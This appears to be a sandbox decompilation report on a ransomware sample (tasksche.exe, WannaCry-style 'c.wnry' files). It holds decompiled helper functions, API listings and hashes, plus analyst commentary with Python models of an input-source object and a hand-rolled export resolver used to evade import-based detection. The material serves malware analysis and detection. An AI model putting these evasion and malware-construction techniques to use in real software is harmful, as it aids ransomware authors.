                    				_v44 = _t18;
                    				if(_t18 != 0xffffffff) {
                    					_t34 = GetFileSize(_t18, 0);
                    					_v40 = _t34;
                    					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
                    						_t28 = GlobalAlloc(0, _t34);
                    						_v36 = _t28;
                    						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
                    							_push(_a8);
                    							_push(0);
                    							_push(0);
                    							_push(_v32);
                    							_push(_t28);
                    							_push(_a4);
                    							if( *0x40f898() != 0) {
                    								_push(1);
                    								_pop(0);
                    							}
                    						}
                    					}
                    				}
                    				_push(0xffffffff);
                    				_push( &_v20);
                    				L004076FA();
                    				 *[fs:0x0] = _v20;
                    				return 0;
                    			}

                    Instruction addresses for E004018F9: 0x004018fc to 0x004019e0 (address column, one entry per decompiled line)

                    APIs
                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
                    • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
                    • ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
                    • _local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateGlobalReadSize_local_unwind2
                    • String ID:
                    • API String ID: 2811923685-0
                    • Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                    • Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
                    • Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                    • Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
                    				char _v5;
                    				char _v6;
                    				long _t30;
                    				char _t32;
                    				long _t34;
                    				void* _t46;
                    				intOrPtr* _t49;
                    				long _t50;
                    
                    				_t30 = _a12;
                    				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
                    					_t49 = _a16;
                    					_t46 = 0;
                    					_v6 = 0;
                    					 *_t49 = 0;
                    					_v5 = 0;
                    					if(_t30 == 1) {
                    						_t46 = _a4;
                    						_v5 = 0;
                    						L11:
                    						_t30 = SetFilePointer(_t46, 0, 0, 1);
                    						_v6 = _t30 != 0xffffffff;
                    						L12:
                    						_push(0x20);
                    						L00407700();
                    						_t50 = _t30;
                    						if(_a12 == 1 || _a12 == 2) {
                    							 *_t50 = 1;
                    							 *((char*)(_t50 + 0x10)) = _v5;
                    							_t32 = _v6;
                    							 *((char*)(_t50 + 1)) = _t32;
                    							 *(_t50 + 4) = _t46;
                    							 *((char*)(_t50 + 8)) = 0;
                    							 *((intOrPtr*)(_t50 + 0xc)) = 0;
                    							if(_t32 != 0) {
                    								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
                    							}
                    						} else {
                    							 *_t50 = 0;
                    							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
                    							 *((char*)(_t50 + 1)) = 1;
                    							 *((char*)(_t50 + 0x10)) = 0;
                    							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
                    							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
                    							 *((intOrPtr*)(_t50 + 0xc)) = 0;
                    						}
                    						 *_a16 = 0;
                    						_t34 = _t50;
                    						goto L18;
                    					}
                    					if(_t30 != 2) {
                    						goto L12;
                    					}
                    					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                    					if(_t46 != 0xffffffff) {
                    						_v5 = 1;
                    						goto L11;
                    					}
                    					 *_t49 = 0x200;
                    					goto L8;
                    				} else {
                    					 *_a16 = 0x10000;
                    					L8:
                    					_t34 = 0;
                    					L18:
                    					return _t34;
                    				}
                    			}

                    Instruction addresses for E00405BAE: 0x00405bb2 to 0x00405c9e (address column, one entry per decompiled line)

                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Pointer$??2@Create
                    • String ID:
                    • API String ID: 1331958074-0
                    • Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                    • Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
                    • Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                    • Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69
                    Uniqueness

                    Uniqueness Score: -1.00%
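E00405BAE builds a 0x20-byte input-source object with operator new (??2@YAPAXI@Z) in one of three modes: 1 wraps an already open handle passed in `_a4`, 2 opens the file named by `_a4` with CreateFileA (GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING) and marks the handle as owned (+0x10), 3 wraps a memory buffer `_a4` of length `_a8`. For handle-backed sources SetFilePointer(h, 0, 0, FILE_CURRENT) decides whether the source is seekable (+1) and, if so, the current position is recorded at +0xc. The status written through `_a16` is 0 on success, 0x200 when the open fails and 0x10000 for any other mode. The example below is added here and is not the sample's code: it models that construction and decodes an object with the same layout, which is what is needed when one turns up in a memory dump. The field names and the stand-in callbacks for CreateFileA and SetFilePointer are mine.

```python
import struct

# Layout of the 0x20-byte object built by E00405BAE (offsets from the listing; names are mine):
# +0 kind (1 file, 0 memory), +1 seekable, +4 handle, +8 flag, +0xc start position,
# +0x10 owns_handle, +0x14 memory address, +0x18 length, +0x1c position
SRC_FMT = "<BBxxIBxxxIBxxxIII"
assert struct.calcsize(SRC_FMT) == 0x20

ERR_BAD_MODE = 0x10000          # status for a mode other than 1, 2, 3
ERR_OPEN_FAILED = 0x200         # status when CreateFileA fails
INVALID_HANDLE_VALUE = 0xFFFFFFFF
INVALID_SET_FILE_POINTER = 0xFFFFFFFF


def make_source(mode, arg, length=0, open_file=None, tell=None):
    """Model of E00405BAE. Returns (object_bytes, status).
    open_file(name) stands in for CreateFileA and returns a handle or INVALID_HANDLE_VALUE;
    tell(handle) stands in for SetFilePointer(handle, 0, 0, FILE_CURRENT)."""
    if mode not in (1, 2, 3):
        return None, ERR_BAD_MODE
    if mode == 3:
        # memory-backed source: +4 and +8 are left untouched by the sample, modelled as 0
        return struct.pack(SRC_FMT, 0, 1, 0, 0, 0, 0, arg, length, 0), 0
    if mode == 1:
        handle, owns = arg, 0
    else:
        handle = open_file(arg)
        if handle == INVALID_HANDLE_VALUE:
            return None, ERR_OPEN_FAILED
        owns = 1
    seekable = 1 if tell(handle) != INVALID_SET_FILE_POINTER else 0
    start = tell(handle) if seekable else 0     # the sample queries the position a second time
    return struct.pack(SRC_FMT, 1, seekable, handle, 0, start, owns, 0, 0, 0), 0


def decode_source(obj):
    """Interpret a dumped 0x20-byte object with the layout above."""
    kind, seekable, handle, _flag, start, owns, mem, length, pos = struct.unpack(SRC_FMT, obj)
    if kind == 1:
        return {"kind": "file", "handle": handle, "seekable": bool(seekable),
                "start": start, "owns_handle": bool(owns)}
    return {"kind": "memory", "address": mem, "length": length, "position": pos}
```

The kind byte at +0 is what the consumers of this object branch on, so when carving candidates out of a heap dump, a 1 or 0 at +0 together with a 0 or 1 at +1 and a plausible handle or pointer at +4 or +0x14 is the pattern to look for.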

                    C-Code - Quality: 37%
                    			E00402924(intOrPtr* _a4, char _a8) {
                    				intOrPtr _v8;
                    				intOrPtr* _t26;
                    				intOrPtr* _t28;
                    				void* _t29;
                    				intOrPtr _t30;
                    				void* _t32;
                    				signed int _t33;
                    				signed int _t37;
                    				signed short* _t41;
                    				intOrPtr _t44;
                    				intOrPtr _t49;
                    				intOrPtr* _t55;
                    				intOrPtr _t58;
                    				void* _t59;
                    
                    				_t26 = _a4;
                    				_t44 =  *((intOrPtr*)(_t26 + 4));
                    				_t28 =  *_t26 + 0x78;
                    				_v8 = _t44;
                    				if( *((intOrPtr*)(_t28 + 4)) == 0) {
                    					L11:
                    					SetLastError(0x7f);
                    					_t29 = 0;
                    				} else {
                    					_t58 =  *_t28;
                    					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
                    					_t59 = _t58 + _t44;
                    					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
                    						goto L11;
                    					} else {
                    						_t8 =  &_a8; // 0x402150
                    						if( *_t8 >> 0x10 != 0) {
                    							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
                    							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
                    							_a4 = 0;
                    							if(_t30 <= 0) {
                    								goto L11;
                    							} else {
                    								while(1) {
                    									_t32 =  *_t55 + _t44;
                    									_t15 =  &_a8; // 0x402150
                    									__imp___stricmp( *_t15, _t32);
                    									if(_t32 == 0) {
                    										break;
                    									}
                    									_a4 = _a4 + 1;
                    									_t55 = _t55 + 4;
                    									_t41 =  &(_t41[1]);
                    									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
                    										_t44 = _v8;
                    										continue;
                    									} else {
                    										goto L11;
                    									}
                    									goto L12;
                    								}
                    								_t33 =  *_t41 & 0x0000ffff;
                    								_t44 = _v8;
                    								goto L14;
                    							}
                    						} else {
                    							_t9 =  &_a8; // 0x402150
                    							_t37 =  *_t9 & 0x0000ffff;
                    							_t49 =  *((intOrPtr*)(_t59 + 0x10));
                    							if(_t37 < _t49) {
                    								goto L11;
                    							} else {
                    								_t33 = _t37 - _t49;
                    								L14:
                    								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
                    									goto L11;
                    								} else {
                    									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
                    								}
                    							}
                    						}
                    					}
                    				}
                    				L12:
                    				return _t29;
                    			}

                    Instruction addresses for E00402924: 0x00402928 to 0x004029c8 (address column, one entry per decompiled line)

                    APIs
                    • _stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
                    • SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_stricmp
                    • String ID: P!@
                    • API String ID: 1278613211-1774101457
                    • Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                    • Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
                    • Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                    • Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85
                    Uniqueness

                    Uniqueness Score: -1.00%
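E00402924 is a hand-rolled export lookup. From the structure passed in `_a4` it takes the image base (`+4`) and the NT headers (`*_a4`), reads the export data directory at NT header offset 0x78, and walks IMAGE_EXPORT_DIRECTORY with the standard offsets (Base at 0x10, NumberOfFunctions at 0x14, NumberOfNames at 0x18, AddressOfFunctions at 0x1c, AddressOfNames at 0x20, AddressOfNameOrdinals at 0x24). An argument whose upper 16 bits are zero is treated as an ordinal, anything else as a name compared with `_stricmp`, so unlike GetProcAddress the match is case-insensitive; every failure path sets last error 0x7f (ERROR_PROC_NOT_FOUND). The bound check `_t33 > NumberOfFunctions` admits an index equal to NumberOfFunctions, one entry past the table. The example below is added here and is not the sample's code: it builds a constructed minimal image holding only an export directory and resolves names and ordinals against it with the same offsets, using `>=` for the bound; the entry names in the test image are sample data.

```python
import struct

EXPORT_DIR_ENTRY = 0x78      # DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT] inside IMAGE_NT_HEADERS32
ERROR_PROC_NOT_FOUND = 0x7F  # the value the sample hands to SetLastError


def build_test_image(exports, ordinal_base=1):
    """Constructed minimal memory-mapped image (RVA == offset) holding only an export
    directory. `exports` is a list of (name, function_rva). Not a real binary."""
    img = bytearray(0x1000)
    e_lfanew, exp_rva = 0x80, 0x200
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    n = len(exports)
    funcs = exp_rva + 0x28
    names = funcs + 4 * n
    ords = names + 4 * n
    strs = ords + 2 * n
    # IMAGE_EXPORT_DIRECTORY fields the sample reads
    struct.pack_into("<IIII", img, exp_rva + 0x10, ordinal_base, n, n, funcs)  # Base, NumberOfFunctions, NumberOfNames, AddressOfFunctions
    struct.pack_into("<II", img, exp_rva + 0x20, names, ords)                  # AddressOfNames, AddressOfNameOrdinals
    for i, (name, rva) in enumerate(exports):
        struct.pack_into("<I", img, funcs + 4 * i, rva)
        struct.pack_into("<I", img, names + 4 * i, strs)
        struct.pack_into("<H", img, ords + 2 * i, i)
        encoded = name.encode() + b"\0"
        img[strs:strs + len(encoded)] = encoded
        strs += len(encoded)
    struct.pack_into("<II", img, e_lfanew + EXPORT_DIR_ENTRY, exp_rva, strs - exp_rva)  # VirtualAddress, Size
    return bytes(img)


def resolve_export(image, proc, image_base=0):
    """Mirror of E00402924 over a mapped image. `proc` is an export name or an ordinal
    (the sample decides by testing the upper 16 bits of the argument).
    Returns (address, 0) on success or (None, ERROR_PROC_NOT_FOUND)."""
    u32 = lambda off: struct.unpack_from("<I", image, off)[0]
    u16 = lambda off: struct.unpack_from("<H", image, off)[0]
    nt = u32(0x3C)
    exp_rva, exp_size = u32(nt + EXPORT_DIR_ENTRY), u32(nt + EXPORT_DIR_ENTRY + 4)
    if exp_size == 0:
        return None, ERROR_PROC_NOT_FOUND
    base_ord, n_funcs, n_names = u32(exp_rva + 0x10), u32(exp_rva + 0x14), u32(exp_rva + 0x18)
    funcs, names, ords = u32(exp_rva + 0x1C), u32(exp_rva + 0x20), u32(exp_rva + 0x24)
    if n_names == 0 or n_funcs == 0:
        return None, ERROR_PROC_NOT_FOUND
    if isinstance(proc, str):
        for i in range(n_names):
            name_off = u32(names + 4 * i)
            name = image[name_off:image.index(b"\0", name_off)].decode()
            if name.lower() == proc.lower():          # _stricmp: case-insensitive, unlike GetProcAddress
                index = u16(ords + 2 * i)
                break
        else:
            return None, ERROR_PROC_NOT_FOUND
    else:
        if proc < base_ord:
            return None, ERROR_PROC_NOT_FOUND
        index = proc - base_ord
    if index >= n_funcs:   # the sample uses '>' here, which admits index == NumberOfFunctions
        return None, ERROR_PROC_NOT_FOUND
    return image_base + u32(funcs + 4 * index), 0
```

The same walk over a real module's export directory is how the sample reaches API addresses without calling GetProcAddress, which is worth remembering when building import-based detections: the named import never appears.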

                    C-Code - Quality: 89%
                    			E00401DFE(void* __eax) {
                    				int _t21;
                    				signed int _t27;
                    				signed int _t29;
                    				void* _t34;
                    				void* _t36;
                    				void* _t38;
                    				void* _t40;
                    				void* _t41;
                    				void* _t43;
                    
                    				_t36 = __eax;
                    				_t41 = _t40 + 0xc;
                    				if(__eax != 0) {
                    					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
                    					_t29 = 0x4a;
                    					memset(_t38 - 0x128, 0, _t29 << 2);
                    					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
                    					_t27 =  *(_t38 - 0x12c);
                    					_t43 = _t41 + 0x18;
                    					_t34 = 0;
                    					if(_t27 > 0) {
                    						do {
                    							E004075C4(_t36, _t34, _t38 - 0x12c);
                    							_t21 = strcmp(_t38 - 0x128, "c.wnry");
                    							_t43 = _t43 + 0x14;
                    							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
                    								E0040763D(_t36, _t34, _t38 - 0x128);
                    								_t43 = _t43 + 0xc;
                    							}
                    							_t34 = _t34 + 1;
                    						} while (_t34 < _t27);
                    					}
                    					E00407656(_t36);
                    					_push(1);
                    					_pop(0);
                    				} else {
                    				}
                    				return 0;
                    			}

                    Instruction addresses for E00401DFE: 0x00401dfe to 0x00401e9d (address column, one entry per decompiled line)

                    APIs
                    • strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
                    • GetFileAttributesA.KERNEL32(?), ref: 00401E6E
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFilestrcmp
                    • String ID: c.wnry
                    • API String ID: 3324900478-3240288721
                    • Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                    • Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
                    • Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                    • Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E00405C9F(signed int __eax, intOrPtr _a4) {
                    				intOrPtr _t9;
                    
                    				_t9 = _a4;
                    				if(_t9 != 0) {
                    					if( *((char*)(_t9 + 0x10)) != 0) {
                    						CloseHandle( *(_t9 + 4));
                    					}
                    					_push(_t9);
                    					L004076E8();
                    					return 0;
                    				} else {
                    					return __eax | 0xffffffff;
                    				}
                    			}

                    0x00405ca0
                    0x00405ca6
                    0x00405cb1
                    0x00405cb6
                    0x00405cb6
                    0x00405cbc
                    0x00405cbd
                    0x00405cc6
                    0x00405ca8
                    0x00405cac
                    0x00405cac

                    APIs
                    • CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
                    • ??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ??3@CloseHandle
                    • String ID: $l@
                    • API String ID: 3816424416-2140230165
                    • Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                    • Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
                    • Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                    • Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 25%
                    			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
                    				void* _t13;
                    				void* _t16;
                    				struct _CRITICAL_SECTION* _t19;
                    				void* _t20;
                    
                    				_t20 = __ecx;
                    				if( *((intOrPtr*)(__ecx + 8)) == 0) {
                    					L3:
                    					return 0;
                    				}
                    				_t19 = __ecx + 0x10;
                    				EnterCriticalSection(_t19);
                    				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
                    				_push(_t19);
                    				if(_t13 != 0) {
                    					LeaveCriticalSection();
                    					memcpy(_a12, _a4, _a8);
                    					 *_a16 = _a8;
                    					_t16 = 1;
                    					return _t16;
                    				}
                    				LeaveCriticalSection();
                    				goto L3;
                    			}

                    0x004019e5
                    0x004019ec
                    0x00401a19
                    0x00000000
                    0x00401a19
                    0x004019ee
                    0x004019f2
                    0x00401a08
                    0x00401a10
                    0x00401a11
                    0x00401a1d
                    0x00401a2c
                    0x00401a3a
                    0x00401a3e
                    0x00000000
                    0x00401a3e
                    0x00401a13
                    0x00000000

                    APIs
                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
                    • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
                    • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
                    • memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$Leave$Entermemcpy
                    • String ID:
                    • API String ID: 3435569088-0
                    • Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                    • Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
                    • Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                    • Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65
                    Uniqueness

                    Uniqueness Score: -1.00%